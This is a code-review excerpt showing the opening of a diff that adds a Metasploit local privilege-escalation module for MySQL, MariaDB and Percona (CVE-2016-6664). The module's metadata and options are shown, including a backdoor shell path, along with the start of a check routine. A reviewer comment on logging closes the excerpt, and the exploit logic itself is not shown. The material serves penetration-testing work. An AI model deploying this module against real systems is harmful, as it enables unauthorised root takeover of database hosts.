modules/exploits/linux/local/mysql_priv_esc.rb

```diff
@@ -0,0 +1,221 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'MySQL / MariaDB / Percona   -   Root Privilege Escalation',
+        'Description'    => %q{
+          MySQL-based databases including MySQL, MariaDB and Percona are affected
+          by a privilege escalation vulnerability which can let attackers who have
+          gained access to mysql system user to further escalate their privileges
+          to root user allowing them to fully compromise the system.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'x2020 <x2020@gmail.com>',  # Module
+            'Dawid Golunski'                  # Discovery
+          ],
+        'DisclosureDate' => 'Nov 01 2016',
+        'Platform'       => [ 'linux'],
+        'SessionTypes'  => ['shell', 'meterpreter'],
+        'Targets'       =>
+          [
+            ['Linux x86', {'Arch' => ARCH_X86}],
+            ['Linux x86_64', {'Arch' => ARCH_X86_64}]
+          ],
+        'DefaultTarget'  => 0,
+        'DefaultOptions' =>
+        {
+          #'PrependSetresuid' => true,
+          #'PrependFork' => true,
+          'DisablePayloadHandler' => true
+        },
+        'References'     =>
+          [
+            [ 'EDB', '40679'],
+            [ 'CVE', '2016-6664'],
+            [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']
+          ]
+      ))
+    register_options(
+      [
+        OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+        OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+      ], self.class)
+  end
+
+  def check
+
+    def check_reqs?()
+      # should have mysqld_safe running
+      check_command = "if pgrep mysqld; "
+      check_command << "then echo OK; "
+      check_command << "fi"
+      output = cmd_exec(check_command).gsub("\r", '')
+      vprint_status output
+      if output['OK'] == 'OK'
+        vprint_good "mysqld_safe is running"
+        return true
+      end
+      vprint_error "mysqld process not running"
```

Comment:
I'd prob change this to be `print_error` instead of vprint, since its hard to sploit mysql when its not running